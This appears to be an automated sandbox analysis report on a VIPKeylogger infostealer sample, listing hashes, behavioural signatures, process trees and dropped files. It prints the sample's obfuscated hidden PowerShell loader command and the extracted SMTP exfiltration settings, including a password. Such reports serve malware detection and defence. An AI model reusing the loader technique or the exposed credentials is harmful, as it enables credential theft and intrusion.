Analysis
-
max time kernel
143s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09-11-2024 03:42
Static task
static1
Behavioral task
behavioral1
Sample
d47cf218c7f1a32c556e0501c3d1f00c420fa75ace47ad2b4fd6242aec388580.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
d47cf218c7f1a32c556e0501c3d1f00c420fa75ace47ad2b4fd6242aec388580.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Analytiske.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Analytiske.ps1
Resource
win10v2004-20241007-en
General
-
Target
d47cf218c7f1a32c556e0501c3d1f00c420fa75ace47ad2b4fd6242aec388580.exe
-
Size
632KB
-
MD5
95359158d57fb8ceb0093d85bdec58b4
-
SHA1
50c7d83505c11307084313f5a6badb7dbf619b75
-
SHA256
d47cf218c7f1a32c556e0501c3d1f00c420fa75ace47ad2b4fd6242aec388580
-
SHA512
ab76232fb8252ed72f12c6ddef03b4cdfa729d89e9eb735e32d6a5bd9d202ab5b1690a0fdb28a36d345238ce3231b2789e75ae5a6e2d25af13cdbc6876a45cba
-
SSDEEP
12288:ONBi378EzqgDY62EJNSGI4GoI2iJK06rNkRDjGQB7F0PgvD5Fb7q:ONg37HqO/hsGjIP4HNktGQMPgNpq
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.fr - Port:
587 - Username:
[email protected] - Password:
Rajahsouthfruits5 - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2652 powershell.exe 1892 powershell.exe -
Loads dropped DLL 2 IoCs
pid Process 1488 Kvartsholdigt.exe 1228 Kvartsholdigt.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Kvartsholdigt.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Kvartsholdigt.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Kvartsholdigt.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Kvartsholdigt.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Kvartsholdigt.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Kvartsholdigt.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 25 drive.google.com 22 drive.google.com 24 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 51 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 1488 Kvartsholdigt.exe 1228 Kvartsholdigt.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 1892 powershell.exe 2652 powershell.exe 1228 Kvartsholdigt.exe 1488 Kvartsholdigt.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Kvartsholdigt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Kvartsholdigt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d47cf218c7f1a32c556e0501c3d1f00c420fa75ace47ad2b4fd6242aec388580.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 1892 powershell.exe 2652 powershell.exe 1892 powershell.exe 2652 powershell.exe 1892 powershell.exe 1892 powershell.exe 1892 powershell.exe 2652 powershell.exe 2652 powershell.exe 2652 powershell.exe 1892 powershell.exe 1892 powershell.exe 1892 powershell.exe 2652 powershell.exe 2652 powershell.exe 2652 powershell.exe 2652 powershell.exe 1892 powershell.exe 1488 Kvartsholdigt.exe 1228 Kvartsholdigt.exe 1488 Kvartsholdigt.exe 1228 Kvartsholdigt.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1892 powershell.exe 2652 powershell.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
description pid Process Token: SeDebugPrivilege 2652 powershell.exe Token: SeDebugPrivilege 1892 powershell.exe Token: SeIncreaseQuotaPrivilege 1892 powershell.exe Token: SeSecurityPrivilege 1892 powershell.exe Token: SeTakeOwnershipPrivilege 1892 powershell.exe Token: SeLoadDriverPrivilege 1892 powershell.exe Token: SeSystemProfilePrivilege 1892 powershell.exe Token: SeSystemtimePrivilege 1892 powershell.exe Token: SeProfSingleProcessPrivilege 1892 powershell.exe Token: SeIncBasePriorityPrivilege 1892 powershell.exe Token: SeCreatePagefilePrivilege 1892 powershell.exe Token: SeBackupPrivilege 1892 powershell.exe Token: SeRestorePrivilege 1892 powershell.exe Token: SeShutdownPrivilege 1892 powershell.exe Token: SeDebugPrivilege 1892 powershell.exe Token: SeSystemEnvironmentPrivilege 1892 powershell.exe Token: SeRemoteShutdownPrivilege 1892 powershell.exe Token: SeUndockPrivilege 1892 powershell.exe Token: SeManageVolumePrivilege 1892 powershell.exe Token: 33 1892 powershell.exe Token: 34 1892 powershell.exe Token: 35 1892 powershell.exe Token: 36 1892 powershell.exe Token: SeIncreaseQuotaPrivilege 2652 powershell.exe Token: SeSecurityPrivilege 2652 powershell.exe Token: SeTakeOwnershipPrivilege 2652 powershell.exe Token: SeLoadDriverPrivilege 2652 powershell.exe Token: SeSystemProfilePrivilege 2652 powershell.exe Token: SeSystemtimePrivilege 2652 powershell.exe Token: SeProfSingleProcessPrivilege 2652 powershell.exe Token: SeIncBasePriorityPrivilege 2652 powershell.exe Token: SeCreatePagefilePrivilege 2652 powershell.exe Token: SeBackupPrivilege 2652 powershell.exe Token: SeRestorePrivilege 2652 powershell.exe Token: SeShutdownPrivilege 2652 powershell.exe Token: SeDebugPrivilege 2652 powershell.exe Token: SeSystemEnvironmentPrivilege 2652 powershell.exe Token: SeRemoteShutdownPrivilege 2652 powershell.exe Token: SeUndockPrivilege 2652 powershell.exe Token: SeManageVolumePrivilege 2652 powershell.exe Token: 33 2652 powershell.exe Token: 34 2652 powershell.exe Token: 35 2652 powershell.exe Token: 36 2652 powershell.exe Token: SeDebugPrivilege 1488 Kvartsholdigt.exe Token: SeDebugPrivilege 1228 Kvartsholdigt.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 4464 wrote to memory of 2652 4464 d47cf218c7f1a32c556e0501c3d1f00c420fa75ace47ad2b4fd6242aec388580.exe 83 PID 4464 wrote to memory of 2652 4464 d47cf218c7f1a32c556e0501c3d1f00c420fa75ace47ad2b4fd6242aec388580.exe 83 PID 4464 wrote to memory of 2652 4464 d47cf218c7f1a32c556e0501c3d1f00c420fa75ace47ad2b4fd6242aec388580.exe 83 PID 4464 wrote to memory of 1892 4464 d47cf218c7f1a32c556e0501c3d1f00c420fa75ace47ad2b4fd6242aec388580.exe 85 PID 4464 wrote to memory of 1892 4464 d47cf218c7f1a32c556e0501c3d1f00c420fa75ace47ad2b4fd6242aec388580.exe 85 PID 4464 wrote to memory of 1892 4464 d47cf218c7f1a32c556e0501c3d1f00c420fa75ace47ad2b4fd6242aec388580.exe 85 PID 1892 wrote to memory of 1488 1892 powershell.exe 97 PID 1892 wrote to memory of 1488 1892 powershell.exe 97 PID 1892 wrote to memory of 1488 1892 powershell.exe 97 PID 1892 wrote to memory of 1488 1892 powershell.exe 97 PID 2652 wrote to memory of 1228 2652 powershell.exe 98 PID 2652 wrote to memory of 1228 2652 powershell.exe 98 PID 2652 wrote to memory of 1228 2652 powershell.exe 98 PID 2652 wrote to memory of 1228 2652 powershell.exe 98 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Kvartsholdigt.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Kvartsholdigt.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\d47cf218c7f1a32c556e0501c3d1f00c420fa75ace47ad2b4fd6242aec388580.exe"C:\Users\Admin\AppData\Local\Temp\d47cf218c7f1a32c556e0501c3d1f00c420fa75ace47ad2b4fd6242aec388580.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Paasknnelsers=Get-Content -raw 'C:\Users\Admin\AppData\Local\Skaberkrfters\Klembt\indgivelsers\Analytiske.Ant';$Besnrelsers=$Paasknnelsers.SubString(54211,3);.$Besnrelsers($Paasknnelsers)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Users\Admin\AppData\Local\Temp\Kvartsholdigt.exe"C:\Users\Admin\AppData\Local\Temp\Kvartsholdigt.exe"3⤵
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1228
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Paasknnelsers=Get-Content -raw 'C:\Users\Admin\AppData\Local\Skaberkrfters\Klembt\indgivelsers\Analytiske.Ant';$Besnrelsers=$Paasknnelsers.SubString(54211,3);.$Besnrelsers($Paasknnelsers)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Users\Admin\AppData\Local\Temp\Kvartsholdigt.exe"C:\Users\Admin\AppData\Local\Temp\Kvartsholdigt.exe"3⤵
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1488
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
854B
MD5e935bc5762068caf3e24a2683b1b8a88
SHA182b70eb774c0756837fe8d7acbfeec05ecbf5463
SHA256a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d
SHA512bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD5d959db7594a86e638c0abed27a55261c
SHA1657e766200a8729d161be376758c0f5e89783943
SHA256f37f9d9cf90407b37178d68f16ec9d5df11b7b06a7a63dffc20784c14a161290
SHA51278071f5e27cb73e71bde8afac316b483c93ef74b74bb989ce061a04d386635870910ba4eb8df951d7db74b6ae7a857009138ec05b01ca5df7e137a9f2c98b59d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_CC847C1C687BCB4C6B5074DF051D733B
Filesize471B
MD58e3753e3859b5c76494a1f50f8612818
SHA1756db726f63168098e836cbe4445e6b8f150f29d
SHA256f881ac0b75e99792bc7f64f9619f435c9c4f0d1e1ab0b14cdb1e5787f33fd6c4
SHA5123b9da62faf4a8dc701979b2cb18b28c52d270b459572db25229a67c138f4dddfec5f80df9b76038fda3a48815cd24bd7458b4bca0e31a8c528df4fbe8eb9536f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7
Filesize472B
MD52268d17aa64cee418bc4659167c367ef
SHA142493d1b9f13b2a21fddb5d238ac2ca4b0fa6c5d
SHA256d5ee56d6bc6d33a989917fdf25e637540c988037d55970b7261fa4f5b0252081
SHA5129608c7d2af9f1cfdc577cc644b3f5d1af178415148f956b1c825316d2eb4140180d5535aa79864584f878e8c2b1e31f2325ebad6e6efa2b310eac4c7544e040f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
Filesize170B
MD5a0e6df701b0b3b3f0daff7f68afec819
SHA1d16a8a7c499f08fa1820cbef58ab437fa6950ffa
SHA256eee05c11d73f502ab3e6a84098395fa3348e54c47476cd58845d03f884e06a42
SHA512b4f9e56d47e258d25e34a535102823bf4efcb59ab0c344f56f7f90dd4c9c923354651356f9df80e0a45074f9277aa5cb263e50310048e762c25ee15e66209345
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD5ef4fd349078ae5e646334a9f9ed5fb9b
SHA1789217db2de0352ae87d1a42c72d597ca9a21e04
SHA256f54ba93c94fb70d8ebbb40ab2153f1005edc4785b2d27c263df09a64e5f685fa
SHA512cedc596fa66afdc3c52f2ee5f6e064052c380bc72d75c278f960cc84530da07960847648f609576959507a768ab583c4e8c05be398d54b2db79fae0b2566b524
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_CC847C1C687BCB4C6B5074DF051D733B
Filesize402B
MD5ab85718b2f7428dc9c36716132ac1251
SHA1c4bae39a5b4d49a451406ac723de055428bb3287
SHA256da8e3ede328e4c61228f8bdf9cf231302d8a3c8e3d046d29f3c1bc0827476fab
SHA512df980d2199380bf75e65d4a28e908639247ff487c3a39dc102efb8fb5be6b468842414a3bc767513272467d6d58acb57b05281851d56ed863bd6b270d8f2be89
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7
Filesize398B
MD5c46b605949e7eb4b14719bc4a315a5c6
SHA10632f7da7a3998bad5cdaeef7b5f84b534e995eb
SHA256d21ad0fbaf427f094b60387f6c2cd4afedf3e732949dbdc90661bcd134c62ee7
SHA512f31f854183a3cd84ed132917a34ded733758624a954ea905ce16cd1db1cad416b0e75a13545653575dcb17d7d88598fb7cd2598ed75f4c148d7a8903981bd197
-
Filesize
53KB
MD501404e51f6442f60e478c306b1e6e52e
SHA137f234ccf5611b8309023410ceb9e76ad81f5678
SHA256d4356dd23aa2e811712132f9718786331661a1bd0d062c49cb76807b9563928b
SHA51294a9d843ae4055e2a9b412f03cba85e2d7b804ec3106f059d14ca50b15ae4acc6cd452f9461c2e21d1632d06848c969732c539aea17869b8b3a2f5ab93b891d7
-
Filesize
52KB
MD564473712892d67203242c7904c6ffd81
SHA172d869d49607487d0ae85da693aacc42709339e2
SHA2569c845196deca4a4738d5bee70cc2169f1dbec420b7d340b5d40642a41287a9a6
SHA5120c8ad907a17bda49371ebca2c4d390347c99c48c13c10c245691113aa087b3ea65fb0811ea623dcd4257f3cc0eca1615ce40d5e2b1cda623356a84e9c18b0383
-
Filesize
294KB
MD5b5f809a8b08fd670917313e4d416c4ee
SHA145a52e67f166760cd53459eb4cddf127315e7e36
SHA2568c07edc80c8f3ef9ad5a55153ad7b81eb2f2cf14760570f137ae62be70bd5567
SHA51249adde8650a72f8838e181ee317a0339f334b206e558e1499f933cbe66fbb32501745ffb4cea25c47d8808a4619996a4e45293acaf8792a87a7cda1afb450d75
-
Filesize
632KB
MD595359158d57fb8ceb0093d85bdec58b4
SHA150c7d83505c11307084313f5a6badb7dbf619b75
SHA256d47cf218c7f1a32c556e0501c3d1f00c420fa75ace47ad2b4fd6242aec388580
SHA512ab76232fb8252ed72f12c6ddef03b4cdfa729d89e9eb735e32d6a5bd9d202ab5b1690a0fdb28a36d345238ce3231b2789e75ae5a6e2d25af13cdbc6876a45cba
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82